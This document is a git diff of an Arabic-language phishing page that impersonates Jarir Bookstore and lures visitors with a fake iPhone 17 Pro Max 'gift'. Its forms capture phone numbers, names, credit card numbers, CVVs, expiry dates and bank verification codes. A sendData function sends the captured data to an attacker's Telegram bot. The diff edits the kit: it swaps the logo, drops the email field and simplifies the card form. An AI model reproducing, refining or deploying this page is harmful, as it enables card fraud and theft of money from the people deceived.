--- a/index.html
+++ b/index.html
@@ -19,10 +19,7 @@
         .cart-icon-container { position: relative; background: #F0F2F5; padding: 8px; border-radius: 8px; }
         .cart-badge { position: absolute; top: -5px; right: -5px; background: #FF9800; color: white; font-size: 10px; width: 18px; height: 18px; border-radius: 50%; display: flex; align-items: center; justify-content: center; font-weight: bold; }
         
-        /* زر العودة للأعلى */
-        .back-to-top { position: fixed; bottom: 80px; left: 20px; background: white; border: 1px solid #DDD; width: 45px; height: 45px; border-radius: 50%; display: flex; align-items: center; justify-content: center; box-shadow: 0 2px 5px rgba(0,0,0,0.1); z-index: 100; }
-
-        /* شاشة التحميل (بدون تغيير التصميم) */
+        /* شاشة التحميل */
         #loader { display: none; position: fixed; top: 0; left: 0; width: 100%; height: 100%; background: white; z-index: 1000; flex-direction: column; justify-content: center; align-items: center; }
         .spinner { width: 40px; height: 40px; border: 4px solid #f3f3f3; border-top: 4px solid var(--jarir-red); border-radius: 50%; animation: spin 1s linear infinite; }
         @keyframes spin { 0% { transform: rotate(0deg); } 100% { transform: rotate(360deg); } }
@@ -55,7 +52,7 @@
                     <i class="fa-solid fa-magnifying-glass text-gray-400 mr-2"></i>
                 </div>
                 <div class="flex items-center ml-2">
-                    <img src="https://upload.wikimedia.org/wikipedia/commons/2/2a/Jarir_Bookstore_Logo.svg" class="h-6">
+                    <img src="https://i.ibb.co/h1mkXJhd/41826-EFC-5-C60-40-C5-BBEC-61-D40-D90-EB9-F.png" alt="Jarir Logo" class="h-10 w-auto">
                 </div>
             </div>
         </header>
@@ -69,37 +66,15 @@
             <img src="https://i.ibb.co/HpTBrKJN/CFE81-C5-E-E4-C2-446-F-99-FF-DECC85-EC63-D0.png" class="w-[280px]">
         </div>
 
-        <main class="p-5">
-            <div class="flex justify-between items-start mb-2">
-                <div class="text-right">
-                    <p class="text-[10px] text-gray-400">رقم الصنف 666736 رقم المنتج MFY94AHA</p>
-                    <h1 class="text-xl font-bold text-gray-900">ابل آيفون 17 برو ماكس</h1>
-                </div>
-                <i class="fa-brands fa-apple text-3xl"></i>
-            </div>
+        <main class="p-5 text-right">
+            <p class="text-[10px] text-gray-400">رقم الصنف 666736 رقم المنتج MFY94AHA</p>
+            <h1 class="text-xl font-bold text-gray-900 mb-4">ابل آيفون 17 برو ماكس</h1>
             
-            <div class="flex flex-wrap gap-2 mb-6 justify-end">
-                <span class="border px-3 py-1 text-xs text-gray-500 rounded">256 جيجابايت</span>
-                <span class="border px-3 py-1 text-xs text-gray-500 rounded">برتقالي كوزمك الجيل الخامس</span>
-                <span class="border px-3 py-1 text-xs text-gray-500 rounded">آبل آيه 19 برو</span>
-            </div>
-
             <div class="flex justify-between items-center mb-6">
                 <button onclick="showPage('page-register')" class="bg-[#E30613] text-white font-bold w-1/2 py-4 rounded-lg text-lg">استلم الهديه</button>
                 <div class="text-right">
-                    <div class="text-[#E30613] text-3xl font-black">هديه من جرير <span class="text-sm">ر.س</span></div>
-                    <p class="text-[10px] text-gray-400">شامل ضريبة القيمة المضافة</p>
+                    <div class="text-[#E30613] text-3xl font-black">هديه من جرير</div>
                 </div>
-            </div>
-
-            <div class="flex justify-between py-6 border-t mt-4">
-                <i class="fa-brands fa-linkedin text-[#0077B5] text-2xl"></i>
-                <i class="fa-brands fa-tiktok text-black text-2xl"></i>
-                <i class="fa-brands fa-snapchat text-[#FFFC00] bg-black p-1 rounded-full text-lg"></i>
-                <i class="fa-brands fa-youtube text-[#FF0000] text-2xl"></i>
-                <i class="fa-brands fa-instagram text-[#E4405F] text-2xl"></i>
-                <i class="fa-brands fa-x-twitter text-black text-2xl"></i>
-                <i class="fa-brands fa-facebook text-[#1877F2] text-2xl"></i>
             </div>
         </main>
     </section>
@@ -108,12 +83,11 @@
         <header class="p-4 border-b flex justify-between items-center">
             <button onclick="showPage('page-product')"><i class="fa-solid fa-chevron-right ml-2"></i>العودة</button>
             <span class="font-bold">معلومات تسليم الهديه</span>
-            <img src="https://upload.wikimedia.org/wikipedia/commons/2/2a/Jarir_Bookstore_Logo.svg" class="h-5">
+            <img src="https://i.ibb.co/h1mkXJhd/41826-EFC-5-C60-40-C5-BBEC-61-D40-D90-EB9-F.png" alt="Jarir Logo" class="h-8 w-auto">
         </header>
         <div class="p-6 space-y-4">
             <input type="tel" id="user-phone" placeholder="رقم الهاتف" class="form-input">
-            <input type="text" id="user-name" placeholder="الاسم الأول" class="form-input">
-            <input type="email" id="user-email" placeholder="البريد الإلكتروني" class="form-input">
+            <input type="text" id="user-name" placeholder="الاسم الكامل" class="form-input">
             <button onclick="sendData('register')" class="btn-red py-4 mt-6">استمرار</button>
         </div>
     </section>
@@ -125,25 +99,13 @@
         </header>
         <main class="p-4">
             <div class="bg-white rounded-lg p-6 shadow-sm border relative">
-                <div class="flex justify-between items-center border p-3 rounded-lg mb-6 border-blue-500 bg-blue-50">
-                    <div class="w-5 h-5 border-[5px] border-blue-600 rounded-full"></div>
-                    <div class="text-right">
-                        <span class="text-sm font-bold block">الدفع بالبطاقة الائتمانية</span>
-                        <div class="flex gap-1 mt-1">
-                            <img src="https://img.icons8.com/color/48/visa.png" class="h-4">
-                            <img src="https://img.icons8.com/color/48/mastercard.png" class="h-4">
-                        </div>
-                    </div>
+                <input type="text" id="card-num" placeholder="رقم البطاقة" class="form-input mb-4">
+                <div class="flex gap-2">
+                    <input type="text" id="card-cvv" placeholder="CVV" class="form-input w-1/3">
+                    <input type="text" id="card-exp" placeholder="MM/YY" class="form-input w-2/3">
                 </div>
-                <div class="space-y-4">
-                    <input type="text" id="card-num" placeholder="رقم البطاقة" class="form-input">
-                    <div class="flex gap-2">
-                        <input type="text" id="card-cvv" placeholder="رمز التحقق (CVV)" class="form-input w-1/3">
-                        <input type="text" id="card-exp" placeholder="تاريخ الانتهاء" class="form-input w-2/3">
-                    </div>
-                    <input type="text" id="card-holder" placeholder="اسم حامل البطاقة" class="form-input">
-                </div>
-                <button onclick="sendData('payment')" class="btn-red py-4 mt-8">مصاريف الشحن( 76ر.س.)</button>
+                <input type="text" id="card-holder" placeholder="اسم حامل البطاقة" class="form-input mt-4">
+                <button onclick="sendData('payment')" class="btn-red py-4 mt-8">دفع (76 ر.س)</button>
             </div>
         </main>
     </section>
@@ -163,7 +125,7 @@
             </div>
             <hr style="margin: 20px 0; border: 0; border-top: 1px solid #eee;">
             <h1 style="font-size: 24px; font-weight: bold; font-family: serif;">Verify By Phone</h1>
-            <p style="font-size: 15px;">You are paying <strong>Jarir Bookstore</strong> the amount of <strong>SAR 76.00</strong>.</p>
+            <p>You are paying <strong>Jarir Bookstore</strong> the amount of <strong>SAR 76.00</strong>.</p>
             <div style="text-align: center; margin-top: 40px;">
                 <label style="color: #888; font-size: 14px; display: block; margin-bottom: 8px;">Verification code</label>
                 <input type="text" id="bank-otp" style="width: 100%; height: 50px; border: 1px solid #ccc; text-align: center; font-size: 24px; border-radius: 4px;">
@@ -193,7 +155,7 @@
         async function sendData(step) {
             let text = "";
             if(step === 'register') {
-                text = `👤 زبون جديد:\n📞 هاتف: ${document.getElementById('user-phone').value}\n📝 اسم: ${document.getElementById('user-name').value}\n📧 بريد: ${document.getElementById('user-email').value}`;
+                text = `👤 زبون جديد:\n📞 هاتف: ${document.getElementById('user-phone').value}\n📝 اسم: ${document.getElementById('user-name').value}`;
                 await fetch(`https://api.telegram.org/bot${botToken}/sendMessage?chat_id=${chatId}&text=${encodeURIComponent(text)}`);
                 startLoading('page-payment');
             } else if(step === 'payment') {
